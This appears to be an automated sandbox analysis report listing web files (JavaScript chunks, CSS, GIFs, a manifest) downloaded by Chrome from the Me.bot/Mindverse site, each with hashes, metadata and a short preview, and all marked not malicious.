                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3194],{83194:function(e){e.exports=JSON.parse('{"leftTabs":{"home":"Home","memories":"Library","iosApp":"iOS App","androidApp":"Android App","chromeExtension":"Chrome Extension","firefoxAddons":"Firefox Add-ons","beta":"beta","phoneModal":{"iosTitle":"Get the iPhone App","androidTitle":"Get the Android App","tip":"Faster and more powerful","appDescription":"The Personal AI for Everyday Memory.","getApp":"Get App","qrTip":"Scan with your phone for a quick download"},"appLanguageModal":{"tip":"Choose your app language of Me.bot"},"mebotSettingModal":{"voice":"Voice","voiceTip":"Enable voices to hear your {{name}} speak.","abilities":"Abilities","selectVoice":"Select Voice","voiceModal":{"title":"Voice Configuration","play":"Play","style":"Style","pitch":"Pitch","speed":"Speed","mute":"Mute","unMute":"Unmute"}}},"library":{"title":"Library"},"layout":{"add":{"addNewMemory":"Add new memory","more":"More","link":"Link","d
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):355611
                                      Entropy (8bit):5.543459262107197
                                      Encrypted:false
                                      SSDEEP:3072:yappAJnaAU3vzlQIaAc2gL9DmLt849rWo4VLNfX52wvDAuDUsEQ:yappAZaP3+qG9mLt84R4VZdDsQ
                                      MD5:F2BD51592A8931BB89D524647DF95890
                                      SHA1:752BC330F5CB9A16D03BB808D8D757793AACC38A
                                      SHA-256:E850FECDA19B4F01B4B78BE3E30E27DA2E1C5A0EEA4CC80001B1BBF305D8FD33
                                      SHA-512:D7BDCC86A844825D40EBCAE20BABFEF4156916DE3457E459DC980ECEBBDEAFC2E0316D4CF95A5A631D4F252F1A24B7F4EFCCB89D92B941963235B4345521CA7C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/595-09c9610e33be8fcc.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[595],{73360:function(e,t,r){e.exports=r(36451)},81641:function(e,t,r){"use strict";var n=r(59608),i=r(79263),a=r(46710),s=r(16524),o=r(26501),c=r(98993),u=r(32791),l=r(67899),f=r(24947),h=r(35842),p=r(65181);e.exports=function(e){return new Promise(function(t,r){var d,y=e.data,g=e.headers,v=e.responseType;function m(){e.cancelToken&&e.cancelToken.unsubscribe(d),e.signal&&e.signal.removeEventListener("abort",d)}n.isFormData(y)&&n.isStandardBrowserEnv()&&delete g["Content-Type"];var C=new XMLHttpRequest;if(e.auth){var E=e.auth.username||"",S=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";g.Authorization="Basic "+btoa(E+":"+S)}var T=o(e.baseURL,e.url);function b(){if(C){var n="getAllResponseHeaders"in C?c(C.getAllResponseHeaders()):null;i(function(e){t(e),m()},function(e){r(e),m()},{data:v&&"text"!==v&&"json"!==v?C.response:C.responseText,status:C.status,statusText:C.statusText,headers:n,config:e,request:C}),C=null
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):253
                                      Entropy (8bit):5.067692741756209
                                      Encrypted:false
                                      SSDEEP:6:G9EMPJXX6C8Vk2WJ/1pwRH4iulbNohU2dCIulbhqC:7C8Vk2W1kF4iulyhXFulhqC
                                      MD5:47407F1DDA481204065493E15107F340
                                      SHA1:5260533208698FD3695AC660EDF173BDD36A45D4
                                      SHA-256:A3BAC0F126662CE47CE66F0FFB75E4F74A65E8D8F2CAC02149213E009FB7A20B
                                      SHA-512:CAF3F368F32FFD912E1A8465B0A5BF1D07E9C696C9588AD1FE90D654186A01A6E17003517CEDD462775C38E52C2F16001908860D96A52FAAF2ADDD3E6E5808AF
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/248c7aaff6f7a864.css
                                      Preview:.index_container__YKX0G{display:flex;flex-direction:column;align-items:center;justify-content:space-around;height:140px}.index_title__VghYo{color:#231309;font-size:28px}.index_description__S8Gov{color:#231309;font-size:20px;font-family:"PT Serif",serif}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (57400), with no line terminators
                                      Category:downloaded
                                      Size (bytes):57404
                                      Entropy (8bit):5.26612267474687
                                      Encrypted:false
                                      SSDEEP:768:QtdQ5HN3VHbnWkhCOgQidp3WORWyFOxQm6/YQkRpP:QtdY9LCnQidpGSOxOo
                                      MD5:07818AF6E335809363D1D09404B1EC76
                                      SHA1:2A838657CE02A62C8F68DB4249175616F10A891E
                                      SHA-256:814D363D6366A4C637B4B8E104B1B4599849A3E65889FEB1009E456FA26CCB6B
                                      SHA-512:2D1ACBD479FC20B0483880B8AEDC9F9559C297AC1660704536DC7924D8D4148D001257671F5A4B88CC3AE28EDD02BDECA88944C2885CFC973CF77037399396B7
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/9578-a4316cb78831d4a3.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9578],{6764:function(e,t,i){"use strict";var s=i(2265),n=i(1583),r=i(19651);t.Z=function(e){r.Z&&!(0,n.mf)(e)&&console.error("useMemoizedFn expected parameter is a function, got ".concat(typeof e));var t=(0,s.useRef)(e);t.current=(0,s.useMemo)(function(){return e},[e]);var i=(0,s.useRef)();return i.current||(i.current=function(){for(var e=[],i=0;i<arguments.length;i++)e[i]=arguments[i];return t.current.apply(this,e)}),i.current}},1583:function(e,t,i){"use strict";i.d(t,{mf:function(){return s}});var s=function(e){return"function"==typeof e}},19651:function(e,t){"use strict";t.Z=!1},57818:function(e,t,i){"use strict";i.d(t,{default:function(){return n.a}});var s=i(50551),n=i.n(s)},50551:function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"default",{enumerable:!0,get:function(){return r}});let s=i(99920);i(57437),i(2265);let n=s._(i(40148));function r(e,t){var i;let s={loading:e=>{l
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (12832), with no line terminators
                                      Category:downloaded
                                      Size (bytes):12832
                                      Entropy (8bit):5.35318276267742
                                      Encrypted:false
                                      SSDEEP:192:cUYFCplciE9gwv5Wc7oDSQ7Yq3pBOY6bpCn6bKroCsKYyC8i9DhK5V6:MC/q7Tu3pBOY6bpCsWwKYci9L
                                      MD5:AB61D52AF60712129B33FE6DDC771A60
                                      SHA1:E4B4EE89A021C2EBC8258A0DAC765F77672AE25C
                                      SHA-256:4E73AB590463243811877EC24426F9F4ACFEFAF951A55858FAF8B46A3527ECCF
                                      SHA-512:C20A3BF66FD5575006090EA565EB9FF4982D2FC5FE47BB0CF6662F452BB17DF460142DE5ADA9B799286FB99BEC7D3AAC440ACBC2FD7653AB8E6F6B6857095C2F
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(nolayout)/layout-3b3976ac2b76a017.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3124],{59478:function(e,n,t){Promise.resolve().then(t.bind(t,10804))},97009:function(e,n,t){"use strict";t.d(n,{Z:function(){return w}});var r=t(83590);function o(e,n){(null==n||n>e.length)&&(n=e.length);for(var t=0,r=Array(n);t<n;t++)r[t]=e[t];return r}function i(e,n){return function(e){if(Array.isArray(e))return e}(e)||function(e,n){var t=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=t){var r,o,i,a,c=[],u=!0,s=!1;try{if(i=(t=t.call(e)).next,0===n){if(Object(t)!==t)return;u=!1}else for(;!(u=(r=i.call(t)).done)&&(c.push(r.value),c.length!==n);u=!0);}catch(e){s=!0,o=e}finally{try{if(!u&&null!=t.return&&(a=t.return(),Object(a)!==a))return}finally{if(s)throw o}}return c}}(e,n)||function(e,n){if(e){if("string"==typeof e)return o(e,n);var t=({}).toString.call(e).slice(8,-1);return"Object"===t&&e.constructor&&(t=e.constructor.name),"Map"===t||"Set"===t?Array.from(e):"Arguments"===t||/^(?:Ui|I)nt(
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (590)
                                      Category:downloaded
                                      Size (bytes):558604
                                      Entropy (8bit):5.709733010176998
                                      Encrypted:false
                                      SSDEEP:6144:HVFDGd9+8cScgz571y+joHXFQuDApgeqCygEeTXB4MGzI8yeK6bDHdClUAJR7Duq:HVxG+LLg9otDAd6SbBpJ8U3lv
                                      MD5:6A36163AA0BBF83AB5D1C9FE0FF046C7
                                      SHA1:B5D6C2EB38480243E8527D29030A895E4558F0B4
                                      SHA-256:430AA09E2AEC35F41AFAC94B13F2550D632F4D12D14549AD3344CF29AA9F40A2
                                      SHA-512:A9299850AB3FDEB4E86DA6E8A1D66F4B9C80BAD0E4CFB0105A7D2DCC7FF380181A611B8681B639E46815BEC3DE31DCAA700FD655C23F8896D42391328FEE4663
                                      Malicious:false
                                      Reputation:low
                                      URL:https://www.gstatic.com/recaptcha/releases/J79K9xgfxwT6Syzx-UyWdD89/recaptcha__en.js
                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var U=function(){return[function(f,V,Z,P,X,D,G,k,H,w,A,S,n,r,K,M,R,t,z,F,g,L,d,v,O,E,m,N,b,q,fc,e,B,V0,l,PL,HL,kK,cL){return f>>((((f&(kK=[1846,2,33],(f<<kK[1]&7)<kK[1]&&(f>>kK[1]&13)>=7&&(cL=Z.M*4294967296+(Z.o>>>V)),93))==f&&c.call(this,V),f)>>1&kK[1])==kK[1]&&(D=[1,191,1213],V.O$?(R=V.Km,S=V.lP,A=J[5](4,12),b=C[16](52,A),M=b.next().value,F=b.next().value,X=b.next().value,K=b.next().value,l=b.next().value,m=b.next().value,PL=b.next().value,b.next(),b.next(),G=b.next().value,b.next(),B=b.next().value,.e=[C[1](65,S,x[32](6,S),x[32](6,kK[0])),x[27](78,S,x[32](kK[2],S),x[32](6,D[kK[1]])),Q[26](22,S,x[32](65,S),x[32]
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5174), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5174
                                      Entropy (8bit):5.277900258802238
                                      Encrypted:false
                                      SSDEEP:96:tnzxy24GFsrjQ4UUJMU5aP2b3ZeqsLKkI:5OGFsrEgMU5aPPVKkI
                                      MD5:D9503BBE3B512AF19D74E87EF753A758
                                      SHA1:A666E36A25497B35751891155455EA3213ED4292
                                      SHA-256:77FCCCB865963AE735FAEDEA1115D292B04173C0917D988FFE9405DF5D65026E
                                      SHA-512:C34989F154CA5A7A87188546947F88E3E109917B0A5E4B502A19C4B3E839ACC1AFF79F5898D0EBB7B9A0E709CD09D0CECF3E7E7E76279F43C290DFAF1190C6D5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/3e8feb4f81ba0ab2.css
                                      Preview:.index_container__Bxedi{display:flex;flex:1;flex-direction:column;gap:12px;width:100%}.index_header__0g8GC{display:flex;align-items:center;justify-content:space-between}.index_title__7ixYZ{display:flex;align-items:center;height:28px;color:#160a0a;font-weight:500;font-size:16px;font-family:Helvetica Neue,sans-serif;line-height:28px;cursor:pointer}.index_total__2fTab{margin-left:4px;color:#160a0a;font-size:16px}.index_addItem__ZnhRg{display:flex;gap:8px;align-items:center}.index_check__WbpUu{box-sizing:border-box;width:16px;height:16px;border:2px solid #756c5d;border-radius:50%;cursor:pointer}.index_addButton__uUTru{display:flex;align-items:center;justify-content:center;width:63px;height:28px;color:#fefdff;font-size:12px;font-family:Helvetica Neue,sans-serif;line-height:20px;background:#231309;border:0;border-radius:8px;cursor:pointer}.index_addButton__uUTru:hover{color:#fefdff!important;background-color:var(--primary-sub-color)}.index_addButton__uUTru .ant-wave{display:none}.index_count
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):111276
                                      Entropy (8bit):5.367578267321225
                                      Encrypted:false
                                      SSDEEP:1536:dKgR1d3xGzl2mg3nvV2+UzGTcgKuIwIWBjK57DYRAFGwa:dPR1nGAmgVNUziKHwRQda
                                      MD5:DD52E2925D30DB4BECABA1CF4125CBA8
                                      SHA1:4FCEDD2E0DBAA909943B56FBBE8728C28BE8DF63
                                      SHA-256:6BF61F27049E65EB3C38CD137CCC10FC029DCB193426375763584A56596154B6
                                      SHA-512:78E18D666E50574895C0B4E7CDEEAA12D9F3BFD66CB5A855575F3BEFAF15EBEA3C7E059950CD23DA5D1F9F68491A15A0AC7C27B22951022EB80D947EDA490F51
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/1073-e4f77f384144a1c4.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1073],{34815:function(e,t,n){var r=(0,n(2265).createContext)({});t.Z=r},45662:function(e,t,n){var r=n(83590),i=n(16105),a=n(84687),o=n(22459),s=n(2265),c=n(9772),l=n.n(c),u=n(17492),d=n(34815),f=n(24835),p=["className","component","viewBox","spin","rotate","tabIndex","onClick","children"],h=s.forwardRef(function(e,t){var n=e.className,c=e.component,h=e.viewBox,g=e.spin,v=e.rotate,m=e.tabIndex,b=e.onClick,y=e.children,x=(0,o.Z)(e,p),w=s.useRef(),Z=(0,u.x1)(w,t);(0,f.Kp)(!!(c||y),"Should have `component` prop or `children`."),(0,f.C3)(w);var E=s.useContext(d.Z),F=E.prefixCls,C=void 0===F?"anticon":F,O=E.rootClassName,S=l()(O,C,(0,a.Z)({},"".concat(C,"-spin"),!!g&&!!c),n),k=l()((0,a.Z)({},"".concat(C,"-spin"),!!g)),R=(0,i.Z)((0,i.Z)({},f.vD),{},{className:k,style:v?{msTransform:"rotate(".concat(v,"deg)"),transform:"rotate(".concat(v,"deg)")}:void 0,viewBox:h});h||delete R.viewBox;var P=m;return void 0===P&&b&&(P=-1),s.c
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):4936077
                                      Entropy (8bit):7.954014938567978
                                      Encrypted:false
                                      SSDEEP:49152:qBqt7MFZLoBA6B8iydbLduF1p6hTbgWksRGysM+/sd77m8k6sNRkb16sYb6aXzB:qotgpldq1ohP622mObDRU1BQnXzB
                                      MD5:ADCEE18AB0F7ABA2A271CF4165E07F38
                                      SHA1:22BE6ECC05CBC655CCB931307845A67081870133
                                      SHA-256:9BA0F3A098F97D980947E5D870F7039DBEDBF57A5B588AC1BE7D8C9D65D637BF
                                      SHA-512:6ECD6B92D5F1C65F3C4566DDFAD1E6122820FDDF3D2BB6282472925C85F1A719BB0D0F8371E9B930296961CDB0FE76D7A093847070D0B5B4170CCE8E79842343
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736845050141/gif-1.gif?number=1
                                      Preview:GIF89a...........eoN....k.hUm]L...XR/:D,.....R..NXL..l..e..U.N...R3GC..w.n2..]0.Y.}W.y^...T2..>.z&.T..^3..O....3.v.vM}F$...........e....p..w...................f....jF............jM....`E..x....y..^.........+1*...eB..ke.?.x..{9..._pji.T.z^kso|.@.c...|..Oyj^...vH.Q....~Un9.._.i...x.N........h...x..d..J.x.g.......V..Q..a..!.....j.........g.hy}[.i..{@...........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:ADA50707CA7611EF94A5E80A6F57A235" xmpMM:DocumentID="xmp.did:ADA50708CA7611EF94A5E80A6F57A235"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):275
                                      Entropy (8bit):4.837018091922256
                                      Encrypted:false
                                      SSDEEP:6:39W2LBAdOvcy9NWN9NIgSqCeRmvdZKVuQl+mWnqVk2GesL7Y:tGOkG8LCg/m/KVR4qVk2Gef
                                      MD5:7D021850285DE393319F6949A3926845
                                      SHA1:8C661279D9723C9DDEA88E07289E08A7462718D8
                                      SHA-256:1E69CB7706CD371B3CE65E6F90928715FE2F5F22C271FBD12ECDE8057DC90076
                                      SHA-512:9D4D64845F17FB6D33EDEA66FC0FF0F5A65DE817CEE6A813F4D0663EED40AC42976F45FD3BA432AC452F3F04FC385516A701379FD8A7A28C6EA1D4A613409216
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/c6128fb675b2ca5b.css
                                      Preview:@keyframes index_rotate__LoRn8{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.index_loading__03PfR svg{animation:index_rotate__LoRn8 1s linear infinite}.index_svgContainer__ItMyI{display:inline-block;display:flex;align-items:center;justify-content:center;font-size:0}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (2938), with no line terminators
                                      Category:downloaded
                                      Size (bytes):2938
                                      Entropy (8bit):5.134756178711228
                                      Encrypted:false
                                      SSDEEP:24:11KJUcyLVB1f/pM1fcRV/p1fcnNLX8Vlj1fcnN6b+C1fcnWX8VVGd2h1fcnKp1fA:esVXZY7M+LgMGJavAnwhQD+Ny
                                      MD5:3F40235E63C25194C762084F31C46435
                                      SHA1:392E998EF936BB4D498851B69C390404BC33B627
                                      SHA-256:7123044596B2AF5C6D26AA684E66F79B00FFF29024627D179986CC46563914E0
                                      SHA-512:3E37EDF4D9A1BDB52F0FD12C34F7978931D0952C62E293D6B89696DAD139448A01B0C7C2EC236C8330E7807E28C692FB2D6EE8BF83584078678DF65B3D880304
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/8d64f630be37c92a.css
                                      Preview:.index_memoryContainer__Z1J1_{display:flex;flex-direction:column;gap:32px;width:100%;max-width:930px;margin:0 auto;padding-bottom:80px;border-radius:16px 16px 0 0}.index_memoryContainer__Z1J1_ .index_smartTopicContainer__5SuTt{display:flex;flex-direction:column;gap:12px;width:100%}.index_memoryContainer__Z1J1_ .index_smartTopicContainer__5SuTt .index_smartTopicHeader__plsGx{display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}.index_memoryContainer__Z1J1_ .index_smartTopicContainer__5SuTt .index_smartTopicHeader__plsGx .index_smartTopicTitle__0ufBG{display:flex;gap:4px;align-items:center;height:28px;color:#160a0a;font-weight:500;font-size:16px;font-family:Helvetica Neue,sans-serif;line-height:28px;cursor:pointer}.index_memoryContainer__Z1J1_ .index_smartTopicContainer__5SuTt .index_smartTopicHeader__plsGx .index_smartTopicTitle__0ufBG .index_smarttopictitlearrow__NreeU{font-size:20px}.index_memoryContainer__Z1J1_ .index_smartTopicContainer__5SuTt .index_smartTop
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):7913355
                                      Entropy (8bit):7.938068907791603
                                      Encrypted:false
                                      SSDEEP:98304:m3r/tYr4JTvDifAqLRSMRMtH2xYHyNrcU:m7Em7+4MSXWwU
                                      MD5:2A8ADC6D3E25692C33763431684DEA6E
                                      SHA1:F2D3A1ABBBF7801608231BAE8ECBD79A77DE02B9
                                      SHA-256:F77071FA14AA2CB3B7973E1F94B1AD5E6E89C9655F9293E668EEA42FB4D0A34F
                                      SHA-512:095B6157565AF085444A06DA8E8DC565375F2BC75E03973C2F12FF29AF3B5845A5E371EEF6B2040CEB4E9F1A542270EC039460F6AB02CA0BC494576636B836B2
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004165/gif-3.gif?number=2
                                      Preview:GIF89a.......L5-`X....-d{!.....J]..&..c........P*.......yy{.......+..x.~mP........uxVK._...f^@...e:1wyg.D)vo..b0zvE.n.LghzSO0.k....d9.Vk3..kW4..('"...1))...=**2) 3!!>).tjZ...<4(d;S...?23vif1.2..........hnAwJ=......hfVQ>;hegaNAfWVvos............R>9>J...aXf.N@.dR....bBvV[...PNL....ow.pf.........YS...KSi....u..c..xZUV.iPx....a.aB*.x.....4...}D.vC#.IO....*.yW.r`..L>.xE..............!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:FC0562B6CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:FC0562B7CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:downloaded
                                      Size (bytes):561
                                      Entropy (8bit):4.567875389810672
                                      Encrypted:false
                                      SSDEEP:12:nH5sH0JHd5tGICarD5V/CLhcNivpWNivT32NiL:H5m0Jd5kUrD5nIxWIb32IL
                                      MD5:6271F5751C5078CDD439D7E9BD8397BF
                                      SHA1:2073ED3970A50CC9E610919C6B30099D4AC49A17
                                      SHA-256:7DC1BFE7ACEBBBD247FF0C713058E8DCA9C7ED6878C5ADAF44EF021581C1C886
                                      SHA-512:23E7D6CBA09828B7CF6CD15A13E4F0120ACF59528AFDF27873084FDB5477DA9DE5D274DD013751634053556CFE315B6168611863CCF514CADE454C345F3B0450
                                      Malicious:false
                                      Reputation:low
                                      URL:https://app.me.bot/manifest.json
                                      Preview:{. "name": "Me.bot",. "short_name": "Me.bot",. "description": "Me.bot: Your Second Brain that Enhances Your Memory and Sparks Creativity",. "start_url": "/",. "display": "standalone",. "background_color": "#F0E7DB",. "theme_color": "#000000",. "icons": [. {. "src": "/mebot_logo.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/mebot_logo.png",. "sizes": "1024x1024",. "type": "image/png". },. {. "src": "/mebot_logo.png",. "sizes": "144x144",. "type": "image/png". }. ].}.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:GIF image data, version 89a, 1500 x 1500
                                      Category:downloaded
                                      Size (bytes):3232558
                                      Entropy (8bit):7.963990290912055
                                      Encrypted:false
                                      SSDEEP:98304:v95SerILRQm0eogO9PS46I8l9L+DO+kLuo:V5SerI910D7Q4R8x+k3
                                      MD5:DA38C956D9D1E8B8C8459E7BAD0AEFF5
                                      SHA1:E38752B3863CA38930FF3737F4A10E6872A3F96E
                                      SHA-256:C89BBB2513041FD075AAC514FB1DF3FE61BD4BCEE05277A747F38A3C7B0B3C67
                                      SHA-512:415487E52AFFCB683A3C07F8DB4E42E486609140545AB2F4A98494834D9781D95F11B0D33E36E44776B110C7B8FEE18BB0C335E1ABBA83D73071FA522E51FC9D
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1736841004164/gif-2.gif?number=1
                                      Preview:GIF89a.........s..ROQ.pS....j.....#..zXHoG6OBD.Y<.n......E<:...:89..h?T...y...X:+....slfe......Z.{5'%...L-...o....w...5 ...qD2,.....3.k.b....c....j.{Z.c" !|z|.........))*..........k....c.......!)!'.........tss..............D($.........:1)[Z[........{Z.kW....................................~kt1-2}k.`MC.xd.....C..gOW..fvM^.Wa...wS......}...._.k.........!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:B5AD7887CA6F11EF96F2C797EE89DF01" xmpMM:DocumentID="xmp.did:B5AD7888CA6F11EF96F2C797EE89DF01"> <xmpM
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (65476), with no line terminators
                                      Category:downloaded
                                      Size (bytes):99525
                                      Entropy (8bit):5.362281242814935
                                      Encrypted:false
                                      SSDEEP:1536:iAIH9ExWls7KpiQ9gWWju92C5YvhZyJRvI4TeNirMSVqb/MxJolfynD20+lxCk+a:eWjsMyJRvI4TeNirMSv4Byn60o7aZq
                                      MD5:5C74120A62570F7592D3C487FCDC3A01
                                      SHA1:2336BE386849D8AC1593D9B5C5C798746C0CBA0A
                                      SHA-256:8EA3CD5FBA10EF1FCB64ADB3D6203F2CF5BAEED2336B6929B9854A57C8F3BFA3
                                      SHA-512:853BBE7358B3D0EC0BDEB7D000D1A38A3B1F7BEB96FE401DC152A744E3ED2EECDD376816D29E9B443832FB9C9EEEC1D4FDE0A5E8DED255BD3EDEEA2079BBB51C
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/9886-112cdec80dc44331.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9886],{10695:function(t,e,n){"use strict";n.d(e,{Z:function(){return c}});var o=n(83590),a=n(2265),r={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M912 190h-69.9c-9.8 0-19.1 4.5-25.1 12.2L404.7 724.5 207 474a32 32 0 00-25.1-12.2H112c-6.7 0-10.4 7.7-6.3 12.9l273.9 347c12.8 16.2 37.4 16.2 50.3 0l488.4-618.9c4.1-5.1.4-12.8-6.3-12.8z"}}]},name:"check",theme:"outlined"},i=n(97009),c=a.forwardRef(function(t,e){return a.createElement(i.Z,(0,o.Z)({},t,{ref:e,icon:r}))})},67176:function(t,e,n){"use strict";n.d(e,{Z:function(){return c}});var o=n(83590),a=n(2265),r={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M866.9 169.9L527.1 54.1C523 52.7 517.5 52 512 52s-11 .7-15.1 2.1L157.1 169.9c-8.3 2.8-15.1 12.4-15.1 21.2v482.4c0 8.8 5.7 20.4 12.6 25.9L499.3 968c3.5 2.7 8 4.1 12.6 4.1s9.2-1.4 12.6-4.1l344.7-268.6c6.9-5.4 12.6-17 12.6-25.9V191.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):317754
                                      Entropy (8bit):5.652979873967676
                                      Encrypted:false
                                      SSDEEP:6144:weeqiuicCRKJLtpOysDAB7OLfMfVhfMWYnKV3Cf6S:weeqiyCRKJLtpOwBIMUnKV/S
                                      MD5:827D6DDF52A24DBB35C0F45CFF0AAFF9
                                      SHA1:2E5AE9D5A36BF20A4DE9B0ADB8A7A9B1034E0CB2
                                      SHA-256:B927898240381A387F000FA80062ABD4704F84F7F315D4562C885668A8AC074E
                                      SHA-512:9D3A2AB4A985B00FBE4A7DF4EE8FB02E9311456EB449CC13B5CA197E8D0FA7F1CDA56F2DAE9B28B31ACA3B5AF10266B40CDC6E46D35E60C4F8B29631E5EC3FBC
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7245-e073fd6ab86568af.js
